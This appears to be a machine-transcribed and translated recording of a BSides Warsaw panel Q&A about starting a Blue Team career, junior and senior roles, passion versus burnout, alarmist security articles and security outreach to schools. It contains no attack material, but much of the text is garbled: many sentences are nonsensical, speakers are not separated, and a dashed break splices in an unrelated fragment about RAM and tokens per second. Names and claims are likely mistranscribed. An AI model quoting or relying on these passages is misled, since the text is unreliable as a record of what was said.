shoulders sag. - The legs sag. - I recommend it. - Paranoia sets in. - No, I won't ask this question. - Read it. - Have you ever exploited your ability to play carotid? - Yes. - No problem. - But don't worry so much. - No. I will wait for the presentation at Mayhack on Tuesday. Of course, questions from the room can also be asked. Does anyone have any questions? But in relation to the previous question, if someone wanted to sponsor some toy... To improve the habit of... To improve penetration. Penetration tests with toys, maybe we'll leave them in the office. Maybe you'll need a volunteer to play with them. We have already covered pentests, so maybe another question. How to

get into the Blue Team? I don't know, I haven't been in one. Same as in security. You have to go to work. You're the only one here who does Blue Team. Wear a blue shirt. And be ready to work shifts. Build some home labs, hangars at home, you can set it up and play. For example. No, no, no. Oh no. I have a harder question about the previous one. Do you want to play, or be in the Blue Team? In the Blue Team rather. I mean, there can't be play in the Blue Team; it bothers me. Whatever they give you there, right? Exactly. Listen, the question was how to start in the Blue Team; I have such

a difficult question. How to finish? How to start in the Blue Team, since everyone wants seniors these days? You have to be a senior from the beginning. If seniors want to. This is an interesting question, because there is a problem that nobody wants to hire a junior, so there is no place to learn the internal work. I worked in a corporation as a senior. I'm not sure what it looks like. You start by being a researcher. You have to be interested in what you want to study. Can you be senior, principal or something else? Yes, because it's not a matter of... What does it mean? Junior, senior: have you been sitting in this since you were young? Do you have high skills? Did

you sit in the corporation for half an hour? What does it mean? You know, it's the best question. I mentioned two companies where I worked for almost 9-9.5 hours. And there was absolutely zero development. So if there are a lot of people working there, they are seniors, they are seniors from the beginning. But it's not skills. Exactly. Sir, if you want to be a senior, you can be a senior in terms of age; in terms of skills, there is no problem. Skills can be gained outside of work. Two hours in the corporation, it's another matter. It's a matter of dedication and all the work. I would encourage you to... Wait, wait, you told me not to start working. If someone has a passion, no,

if someone has no passion, let them not start. If someone has found a passion for themselves... then I have a passion too. I'm just on the other side. Someone has a passion, but doesn't work in cybersecurity. Yes. Because I don't have a passion for cybersecurity anymore. But you know, you lost it over time, not from the beginning. Yes, but it kills it, right? I also assume that if you don't have the passion, then this job is not good. So you were fired, right? For money? No, it's what they lied to us about a long time ago. They said you should do what makes you happy at work. On the one hand, yes, but then it doesn't

make you happy later, because you do it at work. If you want to do the same thing all the time, I don't know, you stop playing, doing anything other than work. I think it would be nice, maybe it would be interesting, I don't know if it would be interesting, but it would definitely be healthier, more mentally healthy, to have a job that is not your hobby, because otherwise you don't have a hobby, you only have the next job. Yes. But on the other hand, if you don't have the passion for work... I'm not saying that you should be a hopper, but if you don't have the passion, then it's a big bummer, right? That's

also true, yes. On the other hand, you can treat it as work from 9 to 7, you know, you finish work, you have to transfer money to the corporation, you transfer the money and you finish, you do something else. I don't know if I can agree with this. I mean, the topic is so wide, security, in my opinion, that even if you do some security at work, you can do other security outside of work, which is also fascinating. You can go to work or go home to do something else. Or vice versa. On your own job. With your own toys. I do it the other way around. I mean, for example, I

break things at work, and at home I do some development. Hobby-like. Great idea. Gentlemen, what interesting thing have you discovered recently? I'm going. Discovered. I have a very nice restaurant near my house, I don't know if you know it, but it was quite tasty. And is it somewhere here? No, it's near my house, far away. I found Excel sheets that should not be public, and they are no longer public, so I'm glad about that. Congratulations. Bravo, Mr. Editor.


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 2 GB could be enough. Or in RAM or on the processor for 32 GB. Only not so fast. But more than 10 tokens per second. I have a plan. Okay. You will put it? Of course. At least around the house. Maybe a question. Have you read something about this new standard for the digital printing? Or something else? Do you have any opinion on this subject? No, I haven't had to deal with it yet. Gentlemen, if not a toy, then

what? A piece of cake. Cakes. A charity toy? I heard that ducks. Can't a duck be a plaything? No, I think there are organizations that say that it can't. I think the right to take a little bit. Thank you. I heard that some guy went there to feed goats or something like that. He became a farmer. Yes. I had to be a bit more relaxed. At the moment, it sometimes happens that you can't look at the farm anymore, but not goats, but a farm and a whole beautiful series of farms. Elkantów recently removed some things. Our chief, when it comes to international BSides, Jack Daniel, not to mention alcohol, became a lute player and makes

guitars, various string instruments, so you can go in that direction. - So, you can do whatever you want. When you write a comment, you have information about the model right away. It's a kind of gratification. It's getting more and more important. It doesn't bother me to deal with physical materials, that when you improve them, they fall apart at some point. And I can improve the computer things infinitely. Oh no! We have to stop it. Do they achieve perfection? Never. I always have a lot to improve and I can always do it. How did I know that? You know, like one of my friends, he works in IT. Maybe you can join us? I'm looking for a safer place. And now he's

doing, for example, wooden stools, plus a door to this and really great stools. So something like that, maybe it's not a gratification for people. Come on, we have free chairs. No, no, no, thank you. But in fact, something like that shows that there is a group that is ready. Well, there are no questions on YouTube for now. Well, that's not a question either. Do you have any? And a question: would you guys like to say something from yourselves at the end? - - My advice is to do something interesting, publish it, share what you do, so that you don't only have it for yourself, but so that others can also use it. And I can't attack anyone.

No, so that at least others can see that you're growing. We can give another example that you can do something with yourself. Because even writing a blog shows that you are not standing still, but you are trying to do something, especially when you are a beginner. You start to work on some systems, then you start writing about it. They won't be good and they won't be correct. They will probably be okay. - Plus writing it also regulates your thoughts usually. Yes, it regulates your thoughts, it regulates your thoughts, and it's more interesting for the future. So this is a way for a junior to become a senior at once. Yes. Sometimes you will get some feedback.

Some of this feedback will be maybe constructive. 90% would be a shame for you anyway, but... But you can make up for this 10%. Ok, question from sen2653: How do you react when you see articles about security written in such a way that it's just a threat? I hear it first. There are a lot of such articles.

I don't know, I'll just put it on the table, because I can't give it away. If you don't try, you'll never write anything, right? No, the question was about how we react to articles that are... Whose, right? Wait, wait. What is the question? The question was, I'll read it again, how do you react when you see articles about security written in such a way that you just get lost? It's not that it's wrongly written, but that they only propose fear. It's probably just some kind of panic, writing such a thing. Maybe someone is interested in security thanks to it. But the idea of ​​needless fear is always a bad idea. I won't be in every editorial office to talk about such articles. It's too much replying. But sometimes

it's good to scare people with smart toasters and so on. There is a question waving his hand. I have a question. Why do people not care about the police? Why are people not interested in security? But which ones? Because you don't have influence on such a car, you don't have influence on what BMW will do until you work there. Or you won't make a media look. But why are people who work in these companies not interested? People who work or people in general? It's complicated. First of all, they don't understand. Because it's a wasteful, disturbing thing. And it's best to deal with others. And we have a free mind and we can do whatever we want. It's not a joke. I have a theory that

the reason is much simpler. As an expert. People have sales provisions, not risks. Cyberpsychologist - He defined the concept of a normal person. - He proved that something like that exists. - It fits in the norm. - 50% is equal to the cross of the gauss, so you have two deviations, one on the one side and the other on the other side. - Where is the gauss? Where is Gauss? Gauss left. I don't know anything like normality. Okay, but it's just that most people, when they deal with people from cybersecurity, and they are not as cool people as here, usually they are people who say: You can't do that, don't use this version. Here you have to log in 10

times, because we will set you a session for 15 minutes. Here we will set you 2FA, and not necessarily, maybe you want to enter something else or connect some keys, etc. So these are people who usually contribute to ordinary people's work. And that's what it's all about. That's why I say people don't want to know. People are supposedly lazy, let's face it. Exactly. And they don't want to have unnecessary things, thanks to which they have free time for what they want to do. Digging in the ocean, I don't know, other things, it doesn't matter. People are supposedly lazy and that's why they don't want to have complications. Simple thing. But it's because of people's secrets

that you can't watch it directly from a Facebook video. No, you can. Let's go back to the topic. The right answer is this. Yes, it's connected. It's also like that. There is no responsibility. The programming industry is one of the few industries where no one is responsible for what happened. Every code is released as it is and that's it. - The next information we have is this guest in the Jekum's room, but we don't know which guest it concerns. A frog is cuckoo. So here the doctor says that frogs only cuckoo, so here are the people themselves, and people do not cuckoo, assuming. Maybe you just don't read stupid questions and troll them. You have to ask stupid questions. There are only stupid answers. And the video is

also stupid. The activist in the back. I have a question for the chief inspector. We all talk about running away from security or continuing this passion if a person has a passion. Do you have any idea how to encourage or discourage young people to use electronics for rabbits? Can we make a visa for children to show them security, but from the side that can fascinate, and at the same time show them that children, if it doesn't fascinate you, stay away. I am for asking boys in the States if they will clap and do it. In electronics, we can do it. They should be able to see that the room is visible from the side, so it's a good place. And

secondly, it's more for children who know something. But ISSA doesn't do it all by cyberscout. Yes, for example, contact the cyber-scout from ISSA. But this is not a level, we are talking about electronic technology. One of the best electronic technologies. - Ah, okay, fine. - It's about going to the youth. - Exactly, here are experts. You are the ones who already know something. Sorry, I'm not technical, so I'm probably the only one in this room who knows. - Me too. - Me too. But I know that there are two children who see, to be honest, that it's a big mess, because either they would like to do something, but they don't know where to go, or they are already in

the electronic engineering field, one of the best in Poland. They are not certified, they do not have 20 years of practice behind them, so maybe these children can be somehow supported, maybe they can do a one-day business for them, maybe they can go out on the field. But they can make a cardboard out of cardboard. It's better. It's a bit more fun. You can use it. There are a few people who later use cardboard. I wonder if anyone has contact with the school. I wonder if I would have it. And they will go to school and they will be happy. It is something that can be done. Such things are done, as it was yesterday in Poznań or as

we did at the military academy. Not only, but also in schools. After all, most of them started in high school. No, most of them started when the high school was still in the planning stage. Ah, yes, because you are already old. Look at the middle age, there are no people here who want to be after high school. Mr. Editor, let's ask for peace. I finished my PhD, I'm a graduate student. I had a job at a university, I graduated from the Department of Computer Science and I had a teacher who fascinated me a bit. He allowed me to play with Wireshark in my room. I could play with it. And of course, what I wanted to do, I wanted to

hack it. At that time I didn't know what I was doing. And I remember that I was just collecting my DNA, but I didn't control anything, so the whole room was full of internet. The class that had these classes was in the sky. But going back to merit, I think that it's also an important role for teachers to be involved in it, because I had a great teacher in the class, who had a big influence on me, that I was interested in it. And as a young man, I thought, how can I show that I know something. And I started writing. And I will return this to everyone, as it was already

mentioned, to write and show that hey, I know something, maybe it's not much, but I can do something. It would be nice if you, maybe next year, as a webinar or something like that, tell people how to write. When you start writing. When you start writing. You take a pen and write. Yes, but how to describe it so that it can be published, I think it is a very useful skill, especially among young people. And what I would like to add here, first of all to you. People have the Internet. They can watch different people. You can really write to all these specialists. Wait, wait, wait. You know that you can watch different people. I know that. I have 40 different channels on YouTube subscribed.

But I know, and this one, this one, someone has to show it to him. Exactly. And he can also get on such ... But it's not like he wants to go on YouTube and find, you know, the right content, because he will get on some channel, some ... rando who did a 15-minute training on Udemy and it's not a new training he did there. These people need to be shown what they are to learn and how they are to learn from this YouTube. Great. The NotDehident Wiki is also a place where you can find such links. Yes, but you need to know about it. Exactly. The difference between today and when the church was starting

is in the amount of materials and their quality. There is a whole lot of materials that are not very useful, not to say that they are wrong. The quality has grown, the quality has fallen. The more dramatically it has grown, the better. Moreover, now AISLOG looks good, and in fact it has a lot of information. I want to remind you of books that were mainly with short manuals from Linux. Or how to write viruses. No, it was a good book. You got me wrong. It's not like a young man wants to go on YouTube and watch it. He just wants to watch it. He just wants to know what he's doing. It's not like a woman who shows a great job. I've

learned a lot from this channel. She shows a lot of things. And if we want to do a training of Kubernetes in 15 minutes, it probably wouldn't be about it. But the concept of the machine is the same. So you would rather show the people on the map who is a valuable thing and who is not. So our case would be to replicate this analysis before they start monitoring it. I think that one thing that would be worth seeing their program, what they can do and what can be done from what they learn. Because you can ask them about software, which we are doing, but they sit in electronics. So that they can use what they already know. Because it gives motivation and quickly

gives some effect. Something useful. - It's a great idea. - They are Polish people, they do great things in the electronic industry. They create satellites in space, so maybe we should contact them. We should start with that. We should inspire them. That's why I have a question. Let's say they can write about the day, what about me? Would there be a chance? - There's always a chance. - There's always a chance. I mean, would Pisański be satisfied with that? If I would say what I'm called, I would just be like: "Oh, yes, thank you." If you say that Visa is effective, nothing will change. You know what, this is also a brand that we usually talk about 300-400 people per country, or more than that. And I suspect

that it was from Security Mall. Who was it? It's about the fact that the security know about it and we would like to show you something. But it's not about showing them, it's about engaging them. Because if you show them, it will be a boring and boring thing without anything. No, no, you didn't understand me. Showing children means inspiring them. Showing in the sense: "Look, you can do something cool. Start, for example, this way." So you need a big name for the management to let go and then a nice content to catch. Exactly. Listen, there is no problem. We can talk to the media, we can talk to the foundations and associations that have anything

in cyber. They will be nice, you will have nice people connected. No problem, you can do it. There is no problem, as I mentioned, it is not a problem. Great! The question is whether it can be done in such a short time. The question is whether it is about you working to hold a conference or you working to start a conversation with Mr. Greczek, with the director. I think that starting from who would do this conference and who would do it, because there are some ideas, hackathons and so on. It all takes time. You have to do it, prepare, think. Maybe I will say it from the other side, because we go to these schools from elementary school to high school.

- I don't want to say anything, I just say how it looks in reality, because for example we can communicate with the school and the parents' council says no and we thank them. It's their children, de facto. We have to make a nice program for these children. It doesn't have to be something super complicated. You get a router, each team gets a router and the winner will do the most interesting thing. Michał is taking part in the project that was mentioned here, Cyfrowe N-Scout. We will not talk about security, because they will become hackers, criminals and will be like those APT groups, which are afraid. I remember being a Microsoft Student Partner, doing

a hackathon at the university as a Bahamian at UZ. They asked me if the academic network could withstand it. I said: "What can it withstand? We will write code there, because hackathons are written for programming." "Oh, because we thought it was something hacker." What? So this is the awareness of people. But no, it came from this, above all, from this understanding of what a hacker is today. - I know. Oskar, don't go out. I try to say, to distinguish, but generally it is true, that unfortunately. But it's also just culture, Polish CRH hacker, right? Someone shapes culture, right? But you know, people are surprised when you do CTF, you understand, and they have to do something in analog, they are very surprised

that such a task in analog, you know, in CTF, where? Well, it's not like that. - The school told us that if we come for free, they don't want to pay us any money. Because for free, no. It's hard to make money, because if you pay money, you have to have a contract, maybe a responsibility for what happened. But for zero, they don't have any... It would be a hard thing to say. It's not a profit, it's a psychological mechanism that makes sense. The more you pay for something, the more you appreciate it. But it's also about the fact that in the case of paying even a small amount, they have a contract then and

they have specific documents in that contract, they stick to it. And so what? We can not come to the guest, for example. Oh, the tickets will be sold. And it's like in Żabka after 23:00 on prohibition, right? I don't know if you've heard how it's done. I'm not on the go. You can't stand in front of Żabka's guest for alcohol, but you can go to the club. Polish people will find a way to every recipe. History taught us that. Yes. The internal Polish hacker. It comes from the history of the meeting when being against the state was a hero. If I call to school, if I set the first meeting to tell what can be done for children,

is anyone willing to help you be a lecturer in the project? And that's what I was talking about, right? Because it's a matter of the road. How is it possible to go after that person and bring him? Do you have something to say? It will be a new law. It's up to you for three hours. For us, five. Eight? Eight? Eight, if you think about... If there is a situation, you are afraid to do it yourself. Listen, when it comes to all things related to cyber, psychology, BHP, or whatever you want from my competition, I just do it in the dark. I have to go to the office two days earlier. I'm not sure if

the management of the educational staff is suitable for them. I don't know. So, if you come to me and leave me at home. In the whole. In the whole. No problem. I'll leave you a button to the Wiosław's parents. On the other hand, it is also the case that to draw a youth, you need some skills in this area specifically, not just in the technique itself. And now you have to think about some kind of certification or not. You don't have to have it when it comes to individual courses, but the only thing you have to do is not be a sexual predator. And we are told to check. OK. Thank you for your attention. You are welcome. We recommend you. We recommend you. You

can see that we invite professionals here as experts. We are good with our faces here. And in general, even Mr. Sen, who said before, wrote that maybe you should let these people out of the seats, because there is some discussion. Tell the gentleman to come here too, we will meet. - I don't work in the chateau anymore, I don't work in any kind of work related to chateau. But I know that all decisions do not fall in schools every week. I assume that we would have to go to the school. I am clear, but you have to be clear about the situation that you know what I said before that even though you are with the school, you can't have resources at the

moment. It's such a complicated issue that really. I am aware of this, so I intend to conduct the conversation in an open way. Basically, you will give us the term, let's say, in May, give us a week and we will adjust to the type of school. In May, we invite you to come and set the date. At the end of the year, no chance. Do you have an agenda? What is needed? It was a story now. There is no agenda yet. In our discussion there was always talk about young people to warn or encourage. At that moment, I associated it with the region that is the most important for us. and to invite young people who will be in the segment for some time. Maybe

we will have this discussion later outside the panel and we will meet in the afternoon or at 5pm and we will talk about it. Are there any more questions? Besides the trolling of Mr Sena.

Well, my dear audience, I think that the current edition of BSides Warsaw is over. Please stop.